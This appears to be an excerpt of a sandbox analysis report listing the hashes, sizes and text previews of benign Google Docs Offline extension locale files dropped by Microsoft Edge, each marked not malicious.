SHA-512:	C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
Malicious:	false
Preview:	{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\sk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	4.882122893545996
Encrypted:	false
SSDEEP:	24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
MD5:	8E55817BF7A87052F11FE554A61C52D5
SHA1:	9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
SHA-256:	903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
SHA-512:	EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\sl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	4.6041913416245
Encrypted:	false
SSDEEP:	12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
MD5:	BFAEFEFF32813DF91C56B71B79EC2AF4
SHA1:	F8EDA2B632610972B581724D6B2F9782AC37377B
SHA-256:	AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
SHA-512:	971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\sr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	4.569671329405572
Encrypted:	false
SSDEEP:	24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
MD5:	7F5F8933D2D078618496C67526A2B066
SHA1:	B7050E3EFA4D39548577CF47CB119FA0E246B7A4
SHA-256:	4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
SHA-512:	0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\sv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	884
Entropy (8bit):	4.627108704340797
Encrypted:	false
SSDEEP:	24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
MD5:	90D8FB448CE9C0B9BA3D07FB8DE6D7EE
SHA1:	D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
SHA-256:	64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
SHA-512:	6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\sw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	980
Entropy (8bit):	4.50673686618174
Encrypted:	false
SSDEEP:	12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
MD5:	D0579209686889E079D87C23817EDDD5
SHA1:	C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
SHA-256:	0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
SHA-512:	D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
Malicious:	false
Preview:	{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wuser popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\ta\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1941
Entropy (8bit):	4.132139619026436
Encrypted:	false
SSDEEP:	24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
MD5:	DCC0D1725AEAEAAF1690EF8053529601
SHA1:	BB9D31859469760AC93E84B70B57909DCC02EA65
SHA-256:	6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
SHA-512:	6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\te\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1969
Entropy (8bit):	4.327258153043599
Encrypted:	false
SSDEEP:	48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
MD5:	385E65EF723F1C4018EEE6E4E56BC03F
SHA1:	0CEA195638A403FD99BAEF88A360BD746C21DF42
SHA-256:	026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
SHA-512:	E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\th\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1674
Entropy (8bit):	4.343724179386811
Encrypted:	false
SSDEEP:	48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
MD5:	64077E3D186E585A8BEA86FF415AA19D
SHA1:	73A861AC810DABB4CE63AD052E6E1834F8CA0E65
SHA-256:	D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
SHA-512:	56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\tr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	4.853399816115876
Encrypted:	false
SSDEEP:	24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
MD5:	76B59AAACC7B469792694CF3855D3F4C
SHA1:	7C04A2C1C808FA57057A4CCEEE66855251A3C231
SHA-256:	B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
SHA-512:	2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\uk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1333
Entropy (8bit):	4.686760246306605
Encrypted:	false
SSDEEP:	24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
MD5:	970963C25C2CEF16BB6F60952E103105
SHA1:	BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
SHA-256:	9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
SHA-512:	1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\ur\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1263
Entropy (8bit):	4.861856182762435
Encrypted:	false
SSDEEP:	24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
MD5:	8B4DF6A9281333341C939C244DDB7648
SHA1:	382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
SHA-256:	5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
SHA-512:	FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\vi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1074
Entropy (8bit):	5.062722522759407
Encrypted:	false
SSDEEP:	24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
MD5:	773A3B9E708D052D6CBAA6D55C8A5438
SHA1:	5617235844595D5C73961A2C0A4AC66D8EA5F90F
SHA-256:	597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
SHA-512:	E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\zh_CN\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	5.7905809868505544
Encrypted:	false
SSDEEP:	12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
MD5:	3E76788E17E62FB49FB5ED5F4E7A3DCE
SHA1:	6904FFA0D13D45496F126E58C886C35366EFCC11
SHA-256:	E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
SHA-512:	F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\zh_HK\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1205
Entropy (8bit):	4.50367724745418
Encrypted:	false
SSDEEP:	24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
MD5:	524E1B2A370D0E71342D05DDE3D3E774
SHA1:	60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
SHA-256:	30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
SHA-512:	D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
Malicious:	false
Preview:	{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\zh_TW\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	843
Entropy (8bit):	5.76581227215314
Encrypted:	false
SSDEEP:	12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
MD5:	0E60627ACFD18F44D4DF469D8DCE6D30
SHA1:	2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
SHA-256:	F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
SHA-512:	6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\zu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	912
Entropy (8bit):	4.65963951143349
Encrypted:	false
SSDEEP:	24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
MD5:	71F916A64F98B6D1B5D1F62D297FDEC1
SHA1:	9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
SHA-256:	EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
SHA-512:	30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
Malicious:	false
Preview:	{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	11280
Entropy (8bit):	5.751992630887702
Encrypted:	false
SSDEEP:	192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvUpGTcjG:m8IEI4u8Rp
MD5:	250C48F4915DD4C0DFA7E7E021A4F066
SHA1:	092A98BF40D8C18280393BF3811A7DFA9A9FD326
SHA-256:	26D9B129339E2E2EB8E0223E16DB3CF0EA220AC0799480D462C236E6A425665E
SHA-512:	8B18E232992E55E8DA97AC46D7AACA061508341D1EADCEFF1E9D0677734DFA8B892AB44754A3AA100585F5B2F2562BC4F2D7103065050FFCD00F91D5915CE5E6
Malicious:	false
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9